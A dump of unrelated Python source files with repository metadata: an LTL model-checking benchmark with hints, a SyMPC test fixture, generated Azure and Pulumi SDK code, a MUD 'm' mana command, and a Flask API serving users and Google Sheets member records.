] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from typing import Tuple, FrozenSet
from collections import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.LE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Minus(l, n1)))
h_l = Hint("h_l1", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
return frozenset(res)
| 38.187919 | 89 | 0.634446 |
8c1e7198f65df63d140f89ce46d0128201c2ecca | 606 | py | Python | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 64 | 2020-12-12T21:58:55.000Z | 2022-03-30T20:46:37.000Z | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 244 | 2020-11-28T17:09:24.000Z | 2022-03-23T15:41:59.000Z | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 55 | 2020-11-28T17:43:15.000Z | 2022-02-10T02:45:04.000Z | """Configuration file to share fixtures across benchmarks."""
# stdlib
from typing import Any
from typing import Callable
from typing import List
# third party
import pytest
import syft as sy
@pytest.fixture
def get_clients() -> Callable[[int], List[Any]]:
    """Fixture returning a factory that builds virtual-machine clients.

    Returns:
        Callable[[int], List[Any]]: factory mapping a count to a list of
        root clients, one per freshly created VirtualMachine.
    """

    def _make_clients(count: int) -> List[Any]:
        clients = []
        for idx in range(count):
            vm = sy.VirtualMachine(name=f"P_{idx}")
            clients.append(vm.get_root_client())
        return clients

    return _make_clients
| 21.642857 | 62 | 0.665017 |
3c327540762b59b6540cb75db376517a2de1f63f | 8,309 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerProbesOperations(object):
"""LoadBalancerProbesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
    def __init__(self, client, config, serializer, deserializer):
        # Pipeline client used to build and send HTTP requests.
        self._client = client
        # Serializer/deserializer for request and response models.
        self._serialize = serializer
        self._deserialize = deserializer
        # Service client configuration (holds subscription_id, etc.).
        self._config = config
    def list(
        self,
        resource_group_name,  # type: str
        load_balancer_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.LoadBalancerProbeListResult"]
        """Gets all the load balancer probes.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param load_balancer_name: The name of the load balancer.
        :type load_balancer_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either LoadBalancerProbeListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_11_01.models.LoadBalancerProbeListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.LoadBalancerProbeListResult"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-11-01"

        def prepare_request(next_link=None):
            # First page: format the templated URL; continuation pages use
            # the server-provided link as-is (no extra query parameters).
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = 'application/json'

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and yield its items plus the next link.
            deserialized = self._deserialize('LoadBalancerProbeListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/probes'}  # type: ignore
    def get(
        self,
        resource_group_name,  # type: str
        load_balancer_name,  # type: str
        probe_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "models.Probe"
        """Gets load balancer probe.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param load_balancer_name: The name of the load balancer.
        :type load_balancer_name: str
        :param probe_name: The name of the probe.
        :type probe_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Probe, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2018_11_01.models.Probe
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop the optional custom-deserialization callback and extra error map
        # out of kwargs before the remaining kwargs are forwarded to the
        # pipeline run below.
        cls = kwargs.pop('cls', None)  # type: ClsType["models.Probe"]
        # 404/409 are mapped to typed azure-core exceptions; callers may extend
        # or override this mapping via the 'error_map' kwarg.
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-11-01"

        # Construct URL by filling the path template stored on this method's
        # metadata with the serialized (validated) path arguments.
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
            'probeName': self._serialize.url("probe_name", probe_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = 'application/json'

        # Construct and send request through the client pipeline (synchronous,
        # non-streaming response body).
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Anything other than 200 is an error: map to a typed exception when
        # the status code appears in error_map, otherwise raise a generic
        # HttpResponseError with ARM error formatting.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('Probe', pipeline_response)

        # When a custom callback was supplied, it receives the raw pipeline
        # response, the deserialized model, and (empty) response headers.
        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    # Path template consumed by the URL construction above.
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/probes/{probeName}'}  # type: ignore
| 46.161111 | 192 | 0.660007 |
b0554b4103173db2b2b7b8905d711bca3a72c4b8 | 8,594 | py | Python | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 31 | 2020-09-21T09:41:01.000Z | 2021-02-26T13:21:59.000Z | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 231 | 2020-09-21T09:38:45.000Z | 2021-03-01T11:16:03.000Z | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 4 | 2020-09-29T14:14:59.000Z | 2021-02-10T20:38:16.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Database']
class Database(pulumi.CustomResource):
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 client_protocol: Optional[pulumi.Input[Union[str, 'Protocol']]] = None,
                 cluster_name: Optional[pulumi.Input[str]] = None,
                 clustering_policy: Optional[pulumi.Input[Union[str, 'ClusteringPolicy']]] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 eviction_policy: Optional[pulumi.Input[Union[str, 'EvictionPolicy']]] = None,
                 modules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ModuleArgs']]]]] = None,
                 persistence: Optional[pulumi.Input[pulumi.InputType['PersistenceArgs']]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None,
                 __name__=None,
                 __opts__=None):
        """
        Describes a database on the RedisEnterprise cluster
        API Version: 2021-03-01.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Union[str, 'Protocol']] client_protocol: Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
        :param pulumi.Input[str] cluster_name: The name of the RedisEnterprise cluster.
        :param pulumi.Input[Union[str, 'ClusteringPolicy']] clustering_policy: Clustering policy - default is OSSCluster. Specified at create time.
        :param pulumi.Input[str] database_name: The name of the database.
        :param pulumi.Input[Union[str, 'EvictionPolicy']] eviction_policy: Redis eviction policy - default is VolatileLRU
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ModuleArgs']]]] modules: Optional set of redis modules to enable in this database - modules can only be added at creation time.
        :param pulumi.Input[pulumi.InputType['PersistenceArgs']] persistence: Persistence settings
        :param pulumi.Input[int] port: TCP port of the database endpoint. Specified at create time. Defaults to an available port.
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        """
        # Backwards compatibility: '__name__' and '__opts__' are deprecated
        # aliases for 'resource_name' and 'opts'; honor them with a warning.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # When no resource id is supplied we are creating (not looking up) the
        # resource, so the property bag must be assembled here; '__props__' is
        # reserved for the get() lookup path below.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()

            __props__['client_protocol'] = client_protocol
            # 'cluster_name' is required unless an existing URN is provided.
            if cluster_name is None and not opts.urn:
                raise TypeError("Missing required property 'cluster_name'")
            __props__['cluster_name'] = cluster_name
            __props__['clustering_policy'] = clustering_policy
            __props__['database_name'] = database_name
            __props__['eviction_policy'] = eviction_policy
            __props__['modules'] = modules
            __props__['persistence'] = persistence
            __props__['port'] = port
            # 'resource_group_name' is required unless an existing URN is provided.
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__['resource_group_name'] = resource_group_name
            # Output-only properties are initialized to None; their values are
            # produced by the provider after the resource is registered.
            __props__['name'] = None
            __props__['provisioning_state'] = None
            __props__['resource_state'] = None
            __props__['type'] = None
        # Register aliases for the versioned type tokens so state recorded
        # under older module paths still resolves to this resource type.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:cache/latest:Database"), pulumi.Alias(type_="azure-nextgen:cache/v20201001preview:Database"), pulumi.Alias(type_="azure-nextgen:cache/v20210301:Database")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(Database, __self__).__init__(
            'azure-nextgen:cache:Database',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'Database':
        """
        Get an existing Database resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # NOTE(review): an empty property bag is passed here; presumably the
        # Pulumi engine hydrates the resource's state from the given id.
        __props__ = dict()

        return Database(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="clientProtocol")
    def client_protocol(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
        """
        return pulumi.get(self, "client_protocol")

    @property
    @pulumi.getter(name="clusteringPolicy")
    def clustering_policy(self) -> pulumi.Output[Optional[str]]:
        """
        Clustering policy - default is OSSCluster. Specified at create time.
        """
        return pulumi.get(self, "clustering_policy")

    @property
    @pulumi.getter(name="evictionPolicy")
    def eviction_policy(self) -> pulumi.Output[Optional[str]]:
        """
        Redis eviction policy - default is VolatileLRU
        """
        return pulumi.get(self, "eviction_policy")

    @property
    @pulumi.getter
    def modules(self) -> pulumi.Output[Optional[Sequence['outputs.ModuleResponse']]]:
        """
        Optional set of redis modules to enable in this database - modules can only be added at creation time.
        """
        return pulumi.get(self, "modules")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def persistence(self) -> pulumi.Output[Optional['outputs.PersistenceResponse']]:
        """
        Persistence settings
        """
        return pulumi.get(self, "persistence")

    @property
    @pulumi.getter
    def port(self) -> pulumi.Output[Optional[int]]:
        """
        TCP port of the database endpoint. Specified at create time. Defaults to an available port.
        """
        return pulumi.get(self, "port")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        Current provisioning status of the database
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter(name="resourceState")
    def resource_state(self) -> pulumi.Output[str]:
        """
        Current resource status of the database
        """
        return pulumi.get(self, "resource_state")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")

    # Map engine-facing camelCase property names to Python snake_case and back;
    # names absent from the tables pass through unchanged.
    def translate_output_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.071795 | 243 | 0.65313 |
6adad3d4b8b7605909645e62e96eca273e684f11 | 2,501 | py | Python | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
# Copyright (c) 2015 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant la commande 'm'."""
from primaires.interpreteur.commande.commande import Commande
class CmdM(Commande):

    """Command 'm': display the character's current mana score."""

    def __init__(self):
        """Set up the command name and its (French) help texts."""
        Commande.__init__(self, "m", "m")
        self.aide_courte = "affiche votre mana"
        self.aide_longue = (
            "Cette commande affiche tout simplement votre mana. "
            "Elle peut être utile si vous avez décidé de masquer "
            "votre prompt (en utilisant par exemple la commande "
            "%prompt% %prompt:défaut%|ent| cacher|ff|) mais "
            "souhaitez connaître votre mana actuelle. Voir "
            "les commandes %v% (pour consulter votre vitalité) et %d% "
            "(pour consulter votre endurance)."
        )

    def interpreter(self, personnage, dic_masques):
        """Send the character its current mana as plain text."""
        mana = personnage.stats.mana
        personnage << str(mana)
| 45.472727 | 79 | 0.719712 |
fbd09c951759208d1f7907c238b803c1f32b5b1d | 3,796 | py | Python | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | from flask import jsonify, request, url_for
from app import db
from app.models import User
from app.api import bp
from app.api.auth import token_auth
from app.api.errors import bad_request
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from datetime import datetime
@bp.route('/users/<int:id>', methods=['GET'])
@token_auth.login_required
def get_user(id):
    """Return the JSON representation of a single user, or 404 if absent."""
    user = User.query.get_or_404(id)
    return jsonify(user.to_dict())
@bp.route('/users', methods=['GET'])
def get_users():
    """Return a paginated collection of users.

    Query string:
        page     -- 1-based page number (default 1).
        per_page -- page size, capped at 100 (default 3).
        html     -- if truthy, also render each user as an HTML card and
                    return the cards alongside the pagination metadata.

    Security fix: user-controlled fields (first_name, last_name, role) and the
    image URL are HTML-escaped before interpolation into the card template to
    prevent stored XSS.
    """
    from html import escape  # stdlib; neutralizes HTML/attribute injection

    page = request.args.get('page', 1, type=int)
    # Cap the page size so a client cannot request an unbounded result set.
    per_page = min(request.args.get('per_page', 3, type=int), 100)
    data = User.to_collection_dict(User.query, page, per_page, 'api.get_users')

    if request.args.get('html'):
        divs = []
        for item in data['items']:
            # Escape every value that ends up in HTML text or attributes;
            # escape() also quotes '"' so attribute contexts are safe.
            first = escape(item['first_name'])
            last = escape(item['last_name'])
            role = escape(item['role'])
            image = escape(url_for('content.send_image',
                                   image_url=item['_links']['image']))
            divs.append('''
            <div class="col-md-3 col-sm-6 mb-md-0 mb-5 mr-5">
                <div class="avatar mx-auto">
                    <img src="{image}" style="width:255px !important; height: 255px !important" alt="{alt}">
                </div>
                <h4 class="font-weight-bold dark-grey-text my-4">{name}</h4>
                <h6 class="text-uppercase grey-text mb-3"><strong>{role}</strong></h6>
            </div>
            '''.format(image=image, alt=first, name=first + ' ' + last, role=role))
        payload = {
            "_links": {
                "next": data['_links']['next'],
                "prev": data['_links']['prev'],
                "self": data['_links']['self']
            },
            "_meta": {
                "page": data['_meta']['page'],
                "per_page": data['_meta']['per_page'],
                "total_items": data['_meta']['total_items'],
                "total_pages": data['_meta']['total_pages']
            },
            'divs': divs
        }
        return jsonify(payload)

    return jsonify(data)
@bp.route('/members', methods=['GET'])
def get_members():
    """Fetch the 2019 membership responses from Google Sheets as JSON.

    Timestamps are normalized from the sheet's 'MM/DD/YYYY HH:MM:SS' format
    into ISO-8601 with a trailing 'Z'.
    """
    scopes = [
        'https://spreadsheets.google.com/feeds',
        'https://www.googleapis.com/auth/drive',
    ]
    credentials = ServiceAccountCredentials.from_json_keyfile_name(
        'client_secret.json', scopes)
    client = gspread.authorize(credentials)

    worksheet = client.open("Computer Club Application (Responses)").worksheet("2019")
    records = worksheet.get_all_records()

    for record in records:
        parsed = datetime.strptime(record['Time Stamp'], '%m/%d/%Y %X')
        record['Time Stamp'] = parsed.isoformat() + 'Z'

    return jsonify(records)
# @bp.route('/users', methods=['POST'])
# def create_user():
# data = request.get_json() or {}
# if 'first_name' not in data or 'last_name' not in data or 'email' not in data or 'password' not in data:
# return bad_request('must include email, password, first_name, last_name fields')
# if User.query.filter_by(email=data['email']).first():
# return bad_request('please use a different email')
# user = User()
# user.from_dict(data, new_user=True)
# db.session.add(user)
# db.session.commit()
# response = jsonify(user.to_dict())
# response.status_code = 201
# response.headers['Location'] = url_for('api.get_user', id=user.id)
# return response
# @bp.route('/users/<int:id>', methods=['PUT'])
# @token_auth.login_required
# def update_user(id):
# user = User.query.get_or_404(id)
# data = request.get_json() or {}
# if 'email' in data and data['email'] != user.email and \
# User.query.filter_by(email=data['email']).first():
# return bad_request('please use a different email address')
# user.from_dict(data, new_user=False)
# db.session.commit()
# return jsonify(user.to_dict())
| 41.26087 | 189 | 0.601159 |
